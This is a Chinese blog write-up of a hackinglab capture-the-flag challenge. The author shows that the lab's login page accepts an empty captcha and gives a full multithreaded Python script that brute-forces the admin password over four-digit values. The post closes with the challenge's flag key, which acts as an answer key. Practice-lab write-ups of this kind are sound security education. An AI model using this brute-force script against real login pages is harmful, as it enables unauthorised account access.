[hackinglab] 逗比验证码第二期

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/Selukwe/article/details/72802735

逗比验证码第二期
分值: 150
验证便失效的验证码

通关地址：http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php
登陆一下，用burp抓包


将这个登录请求导入Repeater，经测试，把验证码删掉，可以正常发送请求。

Connection: keep-alive
Upgrade-Insecure-Requests: 1

这样就好办了，同样是多线程爆破，省去了验证码。代码如下

import requests, re
import threading

url = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php'
login = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php'
s = requests.session()
c = s.get(url).content.decode('utf-8')
print (c)

lock=threading.Lock()

curTask = 1000
maxTask = 10000
flag = False
right = ''
header = {'Referer': 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'}

def thread():
    global lock
    global curTask
    global maxTask
    global flag
    global right
    global header
    while not flag: # 当flag为假也就是正确密码还没出来时，不断取任务来完成
        lock.acquire() #取任务  #这个过程不能被打断
        myTask = curTask
        curTask = curTask + 1
        lock.release()

        if myTask >= maxTask:#所有任务已经完成就退出
            break

        data = {'username':'admin', 'pwd':str(myTask), 'vcode':'', 'submit':'submit'}
        c1 = s.post(login, data=data, headers=header).content.decode('utf-8')
        print (str(myTask) + ':' + c1)

        if 'error' not in c1:
            right = str(myTask) + ', ' + c1
            flag = True # 当密码正确时，flag为真
            
# 多线程执行
threadNum = 50
threadlist = []
for i in range(threadNum):
    threadlist.append(threading.Thread(target = thread))

for i in threadlist:
    i.start()
for i in threadlist:
    i.join()

# 最终输出正确结果
print ('pwd is ' + right)

得到结果：

key是：LJLJL789ss33fasvxcvsdf#@sd